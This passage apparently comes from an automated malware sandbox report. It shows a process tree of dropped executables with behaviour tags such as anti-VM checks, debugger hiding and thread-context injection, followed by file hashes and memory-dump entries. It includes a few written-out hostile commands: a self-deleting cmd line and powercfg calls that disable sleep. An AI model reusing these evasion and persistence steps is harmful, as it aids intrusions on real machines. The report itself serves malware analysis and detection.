C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe"C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"5⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 3204⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe"C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2828 -ip 28281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3564 -ip 35641⤵
-
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exeC:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55e6baeec02c3d93dce26652e7acebc90
SHA1937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5399245c624bdba23e32088e6f5d02262
SHA153eb6c0fcc770cae56e545fcc62ce93fe2c22f59
SHA25608adfe9ca80924571b25c7d1e88a2fd6ec65548833be5fff59e9fa599e875fdd
SHA5129eb606e63a178d574a45775ee678adf3d077f807406443b16a32b799f7b60ade9ec351c4ff0503a7db8035423d23bb641c42f670a5ebaa98f6251750cfe04f48
-
C:\Users\Admin\AppData\Local\Temp\1000012001\stl.exeFilesize
511KB
MD52d92c64d986c4640e4cb5bc41cb38821
SHA1bfc8e36ac6e2e8e6d44cfbc421307bbd58036dd5
SHA25631dd0e69fb3a0a0999aa228d766e36033bbf1e482bdb93912705850badfba7b0
SHA5124975350e13824fe78e937fe9cf84f86d6de502e588cf219ba2d73a171b74af4382b6b134033cc4cb590a6068299422834192bc52613161d2ee362b6464caa962
-
C:\Users\Admin\AppData\Local\Temp\1000013001\rig.exeFilesize
2.5MB
MD54691a9fe21f8589b793ea16f0d1749f1
SHA15c297f97142b7dad1c2d0c6223346bf7bcf2ea82
SHA25663733ff3b794ebd7566103c8a37f7de862348ffacf130661f2c544dea8cde904
SHA512ee27d5912e2fb4b045ffd39689162ab2668a79615b2b641a17b6b03c4273070a711f9f29dd847ffff5ae437d9df6102df6e10e898c36d44ec25e64ba1dd83386
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exeFilesize
493KB
MD592c01627961859a84ffa633327c5d7f9
SHA15b406c39f81f67e2b2e263137c7059718e4af007
SHA25692373c134cbf9fc4a98ed7c80f244c8655b3852d3a1f1983fc4a7b3a00bf1370
SHA512f31f9d45d7783441866faa0e684412040dd74c2878adfc6e5a874626e291b3e3cae7746cb62e2388d4183e615d9b919178fa409f2e12b3d0cf478c59450d3439
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exeFilesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exeFilesize
154KB
MD55f331887bec34f51cca7ea78815621f7
SHA12eb81490dd3a74aca55e45495fa162b31bcb79e7
SHA256d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8
SHA5127a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d
-
C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exeFilesize
415KB
MD5c4aeaafc0507785736e000ff7e823f5e
SHA1b1acdee835f02856985a822fe99921b097ed1519
SHA256b1d5b1e480a5731caacc65609eaf069622f1129965819079aa09bc9d96dadde5
SHA512fbaefbce3232481490bce7b859c6c1bafd87ee6d952a2be9bf7c4ed25fe8fc9aff46c2246e247aa05ce8e405831a5905ca366c5333ede0af48f9a6287479a12d
-
C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exeFilesize
1.7MB
MD5a80a86c701801cbd77cf7406be6d11f0
SHA1ef98a953fae4506e0402de15c1f1d9f0bfb47b01
SHA2562f25790b3368b6afd35007dfe873e90a288cfce9d19758756b71fa6952a675f2
SHA5127e1216bda5c36efcc4146c410cb5717e0e9e8257c25cef2239d631fa6fb15ec953b5155b6c4b4f4f3ff661425d1b6e5b716c21711fc7ddd423e6fc009e363d97
-
C:\Users\Admin\AppData\Local\Temp\1000110001\123.exeFilesize
297KB
MD5cd581d68ed550455444ee6e099c44266
SHA1f131d587578336651fd3e325b82b6c185a4b6429
SHA256a2ebb4bbf2ae4f7755b3ab604996e6c7e570ac8837ca544854ed696a81972505
SHA51233f94920032436cd45906c27cd5b39f47f9519ab5a1a6745bd8a69d81ce729d8e5e425a7538b5f4f6992bd3804e0376085f5da1c28cf9f4d664cabe64036d0b5
-
C:\Users\Admin\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exeFilesize
5.6MB
MD59b297a1485665aef1a926f7cd322c932
SHA17c053b8f3905244558d2c319094ef09985521864
SHA2568c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576
SHA5122a59bb8d940b9bc73ea112aebd04b3b461924adc29f47ea774bd1de23b638c283a041b202693a184d68ec920f2f56160cfded3b17afae31ee46fd00886d9f61b
-
C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exeFilesize
1.2MB
MD5242214131486132e33ceda794d66ca1f
SHA14ce34fd91f5c9e35b8694007b286635663ef9bf2
SHA256bac402b5749b2da2211db6d2404c1c621ccd0c2e5d492eb6f973b3e2d38dd361
SHA512031e0904d949cec515f2d6f2b5e4b9c0df03637787ff14f20c58e711c54eec77d1f22aa0cf0f6efd65362c1fc0066645d5d005c6a77fe5b169427cdd42555d29
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeFilesize
1.8MB
MD55cce8686e206242b06755e8d3b980097
SHA1e2817338b2d55f57189dc48634613187adca42d5
SHA256c6c031988d5561f1274586ed30e4ca87bdf60635645251300d9507cfe1004a93
SHA51281c957a13d1667f722856a15c6ec07da3bd1676c72199971579fb1b6b2ba01e2466a35ddb8c7f1b6a4f3621ffd04b8ec2536bffe9e484f690e8c3a7fb1cd79f1
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.batFilesize
1KB
MD50be4cbfa51fe5f8010e78553a28f2779
SHA1ae21783c148ae1443fa87a43b9b51cb0ab1a799b
SHA256cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90
SHA512337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5t0zjzv.02n.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
568B
MD5e861a08036b9eb5f216deb58e8a7934d
SHA15f12dd049df2f88d95f205a4adc307df78ac16ee
SHA256e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb
SHA5127ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9
-
C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exeFilesize
335KB
MD5894c2e356e72da7a60c2978a258b2081
SHA1d9d57f6bf516c5a381df6d5a81d73314a9a60ffb
SHA2566a76e1042b46a21b225b20eb8d93aac9afd4f028f2fa4c7d09d1f478a67a0352
SHA512c73ddafd2bd0dd582dfb5030460d46b9ba7e9746e169131cc0bafdbda74792bfae2ce6604a9450b28284339915d07569596d1e32b21f1f176445432f8bcbdabf
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exeFilesize
297KB
MD58a70c2805c58fcca31037c6dd59e5833
SHA1233491efa8aab92ecc929ae138fbfbf06877c992
SHA256605636af0dd1495e8a4cbbf6492e5862a4e7536710b533ef1bf1bc8e2670f9d8
SHA512e2041ea7139f34cc621ea0bc0e312cbf41431cdcf4dc5be0c68445bb90be47935e359b6956fe9819e25077bbe6ce1a72ca7349e3956adda3246100c747725c12
-
C:\Users\Admin\AppData\Roaming\d3d9.dllFilesize
279KB
MD58fa26f1e37d3ff7f736fc93d520bc8ab
SHA1ad532e1cb4a1b3cd82c7a85647f8f6dd99833bb1
SHA2566c47da8fbd12f22d7272fbf223e054bf5093c0922d0e8fb7d6289a5913c2e45d
SHA5128a0b53cbc3a20e2f0fd41c486b1af1fbbcf7f2fed9f7368b672a07f25faaa2568bbdbcf0841233ac8c473a4d1dee099e90bf6098a6fa15e44b8526efdafc1287
-
C:\Windows\Tasks\Hkbsse.jobFilesize
284B
MD56f605bac0ed21bda287bbc84bf77d60c
SHA17db1a952279d02ab916cd4d311125a3966e7b0ec
SHA25629423bbc168c5a54b40fe808a30ec7631a4f4eba3c7c895c5566723ef46d8fff
SHA512210c6abc35f9cb45d4a04f85979608047ac96cad3f4104687ca9d7ae5228160c9d92cf231793bef963bde37048656265356283b54326be0fc064ee533aea211f
-
memory/584-424-0x00007FF643DE0000-0x00007FF6443E4000-memory.dmpFilesize
6.0MB
-
memory/584-427-0x00007FF643DE0000-0x00007FF6443E4000-memory.dmpFilesize
6.0MB
-
memory/900-227-0x0000000000A50000-0x0000000000AA0000-memory.dmpFilesize
320KB
-
memory/1428-20-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-348-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-433-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-423-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-400-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-444-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-445-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-21-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-446-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-443-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-19-0x0000000000551000-0x000000000057F000-memory.dmpFilesize
184KB
-
memory/1428-441-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-428-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-442-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-18-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-434-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-230-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-452-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-298-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1428-435-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/1680-405-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-430-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-431-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-429-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-421-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-406-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-409-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-410-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-413-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-415-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-416-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-417-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-414-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-411-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-412-0x0000000001760000-0x0000000001780000-memory.dmpFilesize
128KB
-
memory/1680-408-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1680-407-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/1804-425-0x0000000000760000-0x00000000007B5000-memory.dmpFilesize
340KB
-
memory/1804-426-0x0000000000760000-0x00000000007B5000-memory.dmpFilesize
340KB
-
memory/2140-449-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/2140-451-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/2828-37-0x0000000000AF0000-0x0000000000AF1000-memory.dmpFilesize
4KB
-
memory/2832-226-0x0000000000E20000-0x0000000000E70000-memory.dmpFilesize
320KB
-
memory/3000-112-0x0000016995FA0000-0x0000016995FC2000-memory.dmpFilesize
136KB
-
memory/3360-43-0x0000000008010000-0x000000000811A000-memory.dmpFilesize
1.0MB
-
memory/3360-42-0x0000000006740000-0x0000000006D58000-memory.dmpFilesize
6.1MB
-
memory/3360-40-0x0000000005140000-0x00000000051D2000-memory.dmpFilesize
584KB
-
memory/3360-41-0x0000000005130000-0x000000000513A000-memory.dmpFilesize
40KB
-
memory/3360-266-0x0000000008FF0000-0x00000000091B2000-memory.dmpFilesize
1.8MB
-
memory/3360-240-0x0000000008990000-0x00000000089E0000-memory.dmpFilesize
320KB
-
memory/3360-267-0x0000000009B00000-0x000000000A02C000-memory.dmpFilesize
5.2MB
-
memory/3360-38-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/3360-185-0x0000000006190000-0x00000000061F6000-memory.dmpFilesize
408KB
-
memory/3360-39-0x00000000057B0000-0x0000000005D56000-memory.dmpFilesize
5.6MB
-
memory/3360-46-0x0000000007FB0000-0x0000000007FFC000-memory.dmpFilesize
304KB
-
memory/3360-45-0x0000000007F60000-0x0000000007F9C000-memory.dmpFilesize
240KB
-
memory/3360-44-0x0000000007F00000-0x0000000007F12000-memory.dmpFilesize
72KB
-
memory/4008-1-0x0000000077206000-0x0000000077208000-memory.dmpFilesize
8KB
-
memory/4008-17-0x0000000000400000-0x00000000008B4000-memory.dmpFilesize
4.7MB
-
memory/4008-0-0x0000000000400000-0x00000000008B4000-memory.dmpFilesize
4.7MB
-
memory/4008-2-0x0000000000401000-0x000000000042F000-memory.dmpFilesize
184KB
-
memory/4008-4-0x0000000000400000-0x00000000008B4000-memory.dmpFilesize
4.7MB
-
memory/4008-3-0x0000000000400000-0x00000000008B4000-memory.dmpFilesize
4.7MB
-
memory/4232-329-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/4260-186-0x0000000000400000-0x0000000000592000-memory.dmpFilesize
1.6MB
-
memory/4448-250-0x0000000000820000-0x00000000008A6000-memory.dmpFilesize
536KB
-
memory/4512-317-0x0000000000DE0000-0x0000000000F12000-memory.dmpFilesize
1.2MB
-
memory/4544-438-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/4544-440-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/4560-276-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/4560-286-0x0000000000550000-0x0000000000A04000-memory.dmpFilesize
4.7MB
-
memory/4688-272-0x0000000009070000-0x00000000090E6000-memory.dmpFilesize
472KB
-
memory/4688-273-0x0000000006690000-0x00000000066AE000-memory.dmpFilesize
120KB
-
memory/4688-229-0x0000000000560000-0x00000000005BA000-memory.dmpFilesize
360KB
-
memory/4844-324-0x0000000000510000-0x000000000074C000-memory.dmpFilesize
2.2MB
-
memory/4844-326-0x0000000000510000-0x000000000074C000-memory.dmpFilesize
2.2MB
-
memory/4844-328-0x0000000000510000-0x000000000074C000-memory.dmpFilesize
2.2MB
-
memory/4844-332-0x0000000061E00000-0x0000000061EF3000-memory.dmpFilesize
972KB